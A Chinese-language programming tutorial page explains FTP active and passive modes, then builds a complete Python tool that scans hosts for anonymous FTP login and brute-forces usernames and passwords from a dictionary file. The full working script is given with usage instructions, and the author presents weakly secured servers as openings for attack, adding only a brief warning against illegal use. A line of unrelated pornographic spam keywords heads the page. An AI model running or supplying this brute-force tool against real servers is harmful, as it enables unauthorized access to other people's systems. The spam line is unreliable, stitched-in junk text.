欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Python實(shí)現(xiàn)FTP弱口令掃描器的方法示例

 更新時(shí)間:2019年01月31日 08:27:18   作者:mathor  
這篇文章主要介紹了Python實(shí)現(xiàn)FTP弱口令掃描器的方法示例,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧

FTP服務(wù)器

FTP服務(wù)器是在互聯(lián)網(wǎng)上提供文件存儲(chǔ)和訪問(wèn)服務(wù)的計(jì)算機(jī),它們依照FTP協(xié)議提供服務(wù)。FTP是File Transfer Protocol(文件傳輸協(xié)議)的縮寫(xiě)。顧名思義,就是專(zhuān)門(mén)用來(lái)傳輸文件的協(xié)議,簡(jiǎn)單地說(shuō),支持FTP協(xié)議的服務(wù)器就是FTP服務(wù)器

FTP是僅基于TCP的服務(wù),不支持UDP(想想也是,傳輸文件,肯定要穩(wěn)定可靠,建立連接,所以不支持UDP)。與眾不同的是FTP使用2個(gè)端口,一個(gè)數(shù)據(jù)端口,一個(gè)命令端口(也叫控制端口)。通常來(lái)說(shuō)這兩個(gè)端口分別是21(命名端口)和20(數(shù)據(jù)端口)。但由于FTP工作方式的不同,數(shù)據(jù)端口并不總是20.這就是主動(dòng)與被動(dòng)FTP的最大不同之處。

  • 主動(dòng)FTP

FTP服務(wù)器的控制端口是21,數(shù)據(jù)端口是20,所以在做靜態(tài)映射的時(shí)候只需開(kāi)放21端口即可,他會(huì)用20端口和客戶(hù)端主動(dòng)發(fā)起連接

  • 被動(dòng)FTP

服務(wù)器的控制端口是21,數(shù)據(jù)端口是隨機(jī)的,且是客戶(hù)端去連接對(duì)應(yīng)的數(shù)據(jù)端口,所以在做靜態(tài)映射的話只開(kāi)放21端口不可以的

FTP掃描的實(shí)現(xiàn)方案

掃描匿名FTP

FTP匿名登陸的掃描主要應(yīng)用與批量掃描中,單獨(dú)針對(duì)一個(gè)FTP服務(wù)器進(jìn)行掃描的話成功率比較小。很多網(wǎng)站都開(kāi)放FTP服務(wù)方便用戶(hù)下載資源(這個(gè)允許匿名登陸不足為奇),更瘋狂的是網(wǎng)站管理人員為了方便網(wǎng)站訪問(wèn)軟件的更新也開(kāi)放了FTP匿名登陸,這樣就給了我們很多機(jī)會(huì),尤其后者的服務(wù)器很容易受到攻擊

掃描FTP弱口令

弱口令掃描其實(shí)只是掃描一些簡(jiǎn)單的密碼組合,并不是所有可能的密碼組合

步驟

FTP匿名掃描器的實(shí)現(xiàn)

這里需要用到Python的 ftplib 庫(kù)中的FTP這個(gè)類(lèi),這個(gè)類(lèi)實(shí)現(xiàn)了FTP客戶(hù)端的大多數(shù)功能,比如連接FTP服務(wù)器、查看服務(wù)器中的文件、上傳、下載文件等功能,詳細(xì)用法可以查看API,接下來(lái)我們首先定義 anonScan(hostname) 這個(gè)函數(shù)以實(shí)現(xiàn)掃描可匿名登陸的FTP服務(wù)器。代碼如下:

def anonScan(hostname):      # 參數(shù)是主機(jī)名
  try:
    with FTP(hostname) as ftp: # 創(chuàng)建FTP對(duì)象
      ftp.login()      # FTP匿名登陸
      print("\n[*]" + str(hostname) + " FTP Anonymous login successful!")
      return True
    except Exception as e:   # 拋出異常表示匿名登陸失敗
      print("\n[-]" + str(hostname) + " FTP Anonymous login failure!")
      return False

代碼很簡(jiǎn)短,注釋也寫(xiě)的很清楚。這里還是說(shuō)一下函數(shù)的思路,首先用主機(jī)名構(gòu)造了一個(gè)FTP對(duì)象(即ftp),然后用ftp調(diào)用不帶參數(shù)的login()函數(shù)即表示要匿名登陸這個(gè)FTP服務(wù)器,如果登陸過(guò)程中沒(méi)有產(chǎn)生異常,則表明匿名登陸成功,否則匿名登陸失敗

FTP弱口令的掃描

FTP弱口令掃描依賴(lài)于用戶(hù)名和密碼字典,密碼字典 下載 ,下載之后我們將其命名為 pwd.txt

接下來(lái)針對(duì)字典中的格式來(lái)實(shí)現(xiàn)FTP弱口令掃描,創(chuàng)建代碼文件 ftpScanner.py ,代碼如下:

def vlcLogin(hostname, pwdFile):        # Parameters (hostname, dictionary file)
  try:
    with open(pwdFile, 'r') as pf:     # Open dictionary file
      for line in pf.readlines():
        userName = line.split(':')[0]  # Fetch username
        passWord = line.split(':')[1].strip('\r').strip('\n') # Fetch password
        print('[+] Trying: ' + userName + ':' + passWord)
        try:
          with FTP(hostname) as ftp:
            ftp.login(userName, passWord)
            print('\n[+] ' + str(hostname) + ' FTP Login successful: '+ \
               userName + ':' + passWord)
            return (userName, passWord)
        except Exception as e:
          # Continue trying other usernames and passwords
          pass
  except IOError as e:
    print('Error: the password file does not exist!')
  print('\n[-] Cannot crack the FTP password, please change the password dictionary try again!')
  return (None,None)

這段代碼其實(shí)就是循環(huán)從字典中讀取用戶(hù)名和密碼并嘗試登陸,登陸成功則表明找到用戶(hù)名和密碼。由于這個(gè)函數(shù)將主機(jī)名定義成了可以用 , 分割的字符串。找到密碼并不會(huì)終止程序,而是會(huì)繼續(xù)掃描其他主機(jī)的弱口令,直到所有的主機(jī)都掃描一遍

命令行解析

至此,F(xiàn)TP掃描器幾乎已經(jīng)完成了,現(xiàn)在我們要做的是讓我們的腳本可以處理命令行輸入,以控制掃描哪些主機(jī)。命令行參數(shù)我們將用到Python中的 argparse 庫(kù)。

parser = argparse.ArgumentParser(description='FTP Scanner')
  parser.add_argument('-H',dest='hostName',help='The host list with ","space')
  parser.add_argument('-f',dest='pwdFile',help='Password dictionary file')
  options = None
  try:
    options = parser.parse_args()

  except:
    print(parser.parse_args(['-h']))
    exit(0)

  hostNames = str(options.hostName).split(',')
  pwdFile = options.pwdFile

整合全部代碼

# -*- coding: utf-8 -*-
from ftplib import *
import argparse
import time

# Anonymous login scan
def anonScan(hostname):      # The parameter is the host name
  try:
    with FTP(hostname) as ftp: # Create FTP object
      ftp.login()      # FTP anonymous login
      print("\n[*]" + str(hostname) + " FTP Anonymous login successful!")
      return True
  except Exception as e:   # Throwing an exception indicates that the anonymous login failed
    print("\n[-]" + str(hostname) + " FTP Anonymous login failure!")
    return False

# Brute force
def vlcLogin(hostname, pwdFile):        # Parameters (hostname, dictionary file)
  try:
    with open(pwdFile, 'r') as pf:     # Open dictionary file
      for line in pf.readlines():
        userName = line.split(':')[0]  # Fetch username
        passWord = line.split(':')[1].strip('\r').strip('\n') # Fetch password
        print('[+] Trying: ' + userName + ':' + passWord)
        try:
          with FTP(hostname) as ftp:
            ftp.login(userName, passWord)
            print('\n[+] ' + str(hostname) + ' FTP Login successful: '+ \
               userName + ':' + passWord)
            return (userName, passWord)
        except Exception as e:
          # Continue trying other usernames and passwords
          pass
  except IOError as e:
    print('Error: the password file does not exist!')
  print('\n[-] Cannot crack the FTP password, please change the password dictionary try again!')
  return (None,None)

def main():
  parser = argparse.ArgumentParser(description='FTP Scanner')
  parser.add_argument('-H',dest='hostName',help='The host list with ","space')
  parser.add_argument('-f',dest='pwdFile',help='Password dictionary file')
  options = None
  try:
    options = parser.parse_args()

  except:
    print(parser.parse_args(['-h']))
    exit(0)

  hostNames = str(options.hostName).split(',')
  pwdFile = options.pwdFile
  if hostNames == ['None']:
    print(parser.parse_args(['-h']))
    exit(0)

  for hostName in hostNames:
    username = None
    password = None
    if anonScan(hostName) == True:
      print('Host: ' + hostName + ' Can anonymously!')
    elif pwdFile != None:
      (username,password) = vlcLogin(hostName,pwdFile)
      if password != None:
        print('\n[+] Host: ' + hostName + 'Username: ' + username + \
           'Password: ' + password)
  print('\n[*]-------------------Scan End!--------------------[*]')


if __name__ == '__main__':
  main()

測(cè)試掃描

至此就可以測(cè)試我們的FTP弱口令掃描器了,在命令行中輸入

python ftpScanner.py -H 127.0.0.1 -f pwd.txt

因?yàn)槲冶镜夭](méi)有開(kāi)啟ftp服務(wù),所以掃描不成功,大家可以嘗試在服務(wù)器上開(kāi)放FTP服務(wù),然后進(jìn)行測(cè)試,絕對(duì)不能用于非法用途

以上就是本文的全部?jī)?nèi)容,希望對(duì)大家的學(xué)習(xí)有所幫助,也希望大家多多支持腳本之家。

相關(guān)文章

  • 如何用python獲取EXCEL文件內(nèi)容并保存到DBC

    如何用python獲取EXCEL文件內(nèi)容并保存到DBC

    很多時(shí)候,使用python進(jìn)行數(shù)據(jù)分析的第一步就是讀取excel文件,下面這篇文章主要給大家介紹了關(guān)于如何用python獲取EXCEL文件內(nèi)容并保存到DBC的相關(guān)資料,需要的朋友可以參考
    2023-12-12
  • go和python調(diào)用其它程序并得到程序輸出

    go和python調(diào)用其它程序并得到程序輸出

    這里介紹下用python和go語(yǔ)言的實(shí)現(xiàn)將其它程序的輸出直接保存成變量供程序使用的方法,大家參考使用吧
    2014-02-02
  • python3格式化字符串 f-string的高級(jí)用法(推薦)

    python3格式化字符串 f-string的高級(jí)用法(推薦)

    從Python 3.6開(kāi)始,f-string是格式化字符串的一種很好的新方法。與其他格式化方式相比,它們不僅更易讀,更簡(jiǎn)潔,不易出錯(cuò),而且速度更快!本文重點(diǎn)給大家介紹python3格式化字符串 f-string的高級(jí)用法,一起看看吧
    2020-03-03
  • Python多線程原理與用法詳解

    Python多線程原理與用法詳解

    這篇文章主要介紹了Python多線程原理與用法,簡(jiǎn)單描述了多線程的概念、原理并結(jié)合實(shí)例形式分析了Python多線程創(chuàng)建、啟動(dòng)、各種鎖機(jī)制、隊(duì)列及相關(guān)函數(shù)使用技巧,需要的朋友可以參考下
    2018-08-08
  • pytorch1.0中torch.nn.Conv2d用法詳解

    pytorch1.0中torch.nn.Conv2d用法詳解

    今天小編就為大家分享一篇pytorch1.0中torch.nn.Conv2d用法詳解,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧
    2020-01-01
  • 利用Python實(shí)現(xiàn)一個(gè)下班倒計(jì)時(shí)程序

    利用Python實(shí)現(xiàn)一個(gè)下班倒計(jì)時(shí)程序

    身為打工人,一定是想著下班的那一刻吧,這篇文章主要來(lái)和大家介紹一下如何利用Python實(shí)現(xiàn)一個(gè)下班倒計(jì)時(shí)程序,感興趣的小伙伴可以跟隨小編一起學(xué)習(xí)一下
    2023-12-12
  • Anaconda多環(huán)境多版本python配置操作方法

    Anaconda多環(huán)境多版本python配置操作方法

    下面小編就為大家?guī)?lái)一篇Anaconda多環(huán)境多版本python配置操作方法。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧
    2017-09-09
  • Python selenium 實(shí)例之通過(guò) selenium 查詢(xún)禪道是否有任務(wù)或者BUG

    Python selenium 實(shí)例之通過(guò) selenium 查詢(xún)禪道是否有任務(wù)或者BUG

    這篇文章主要介紹了Python selenium 實(shí)例之通過(guò) selenium 查詢(xún)禪道是否有任務(wù)或者BUG的相關(guān)資料,本文通過(guò)實(shí)例代碼給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2021-09-09
  • 使用Python實(shí)現(xiàn)有趣的鎖屏小工具

    使用Python實(shí)現(xiàn)有趣的鎖屏小工具

    這篇文章主要為大家詳細(xì)介紹了如何使用Python實(shí)現(xiàn)有趣的鎖屏小工具,這樣再也不用擔(dān)心因?yàn)闆](méi)有鎖屏被扣工資啦,打工人快跟隨小編一起學(xué)習(xí)一下吧
    2023-12-12
  • 在Python中使用K-Means聚類(lèi)和PCA主成分分析進(jìn)行圖像壓縮

    在Python中使用K-Means聚類(lèi)和PCA主成分分析進(jìn)行圖像壓縮

    這篇文章主要介紹了在Python中使用K-Means聚類(lèi)和PCA主成分分析進(jìn)行圖像壓縮,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2020-04-04

最新評(píng)論